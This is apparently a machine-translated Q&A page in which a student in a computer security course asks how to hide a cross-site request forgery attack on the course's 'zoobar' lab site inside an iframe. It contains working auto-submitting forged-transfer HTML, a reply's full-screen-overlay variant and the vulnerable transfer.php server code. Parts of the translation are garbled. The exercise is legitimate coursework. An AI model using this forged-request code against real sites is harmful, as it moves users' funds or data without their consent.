Javascript 如何在iframe的帮助下无形地提交表单
这是一个关于我正在学习的计算机安全课程的问题 我有以下工作HTML文档,可以简单地为我提交表单:Javascript 如何在iframe的帮助下无形地提交表单,javascript,php,html,iframe,Javascript,Php,Html,Iframe,这是一个关于我正在学习的计算机安全课程的问题 我有以下工作HTML文档,可以简单地为我提交表单: <form method="POST" name="transferform" action="http://dasak.csc.kth.se/zoobar/transfer.php"> <p>Send <input name="zoobars" type=text value="1" size=5> </p> <p>to <in
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se")
</script>
据我所知,我制作的HTML文档在没有iframe的情况下工作,我相信iframe在某种程度上阻碍或改变了脚本的执行。有人知道这是不是真的吗?如果没有,那么是什么原因导致了这种更改或无功能?如果我没说错的话,您希望将表单隐藏在iframe后面 所以
发送
到
document.getElementsByName(“提交”)[0]。单击();
位置。替换(“http://dasak.csc.kth.se")
结果:您好,谢谢您的回复!我已经尝试过了,问题是在提交表单后,我被重定向到´´页面。这是不可取的,有什么办法可以防止吗?
<iframe src = "http://www.kth.se">
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se");
</script>
</iframe>
<iframe src = "http://www.kth.se">
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
</iframe>
<script>
document.getElementsByName("submission")[0].click();
</script>
<?php
require_once("includes/common.php");
nav_start_outer("Transfer");
nav_start_inner();
if($_POST['submission']) {
$recipient = $_POST['recipient'];
$zoobars = (int) $_POST['zoobars'];
$sql = "SELECT Zoobars FROM Person WHERE Username='" .
addslashes($user->username) . "'";
$rs = $db->executeQuery($sql);
$sender_balance = $rs->getValueByNr(0,0) - $zoobars;
$sql = "SELECT Username, Zoobars FROM Person WHERE Username='" .
addslashes($recipient) . "'";
$rs = $db->executeQuery($sql);
$recipient_exists = $rs->getValueByNr(0,0);
if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists) {
$sql = "UPDATE Person SET Zoobars = $sender_balance " .
"WHERE Username='" . addslashes($user->username) . "'";
$db->executeQuery($sql);
$sql = "SELECT Zoobars FROM Person WHERE Username='".
addslashes($recipient) . "'";
$rs = $db->executeQuery($sql);
$recipient_balance = $rs->getValueByNr(0,0) + $zoobars;
$sql = "UPDATE Person SET Zoobars = $recipient_balance " .
"WHERE Username='" . addslashes($recipient) . "'";
$db->executeQuery($sql);
$result = "Sent $zoobars zoobars";
}
else $result = "Transfer to $recipient failed.";
}
?>
<form method="POST" name="transferform"
action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
<iframe style="background-color:grey;display:block;position:fixed;top:0px;left:0px;right:0px;bottom:0px;z-index:9999"></iframe>
<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se")
</script>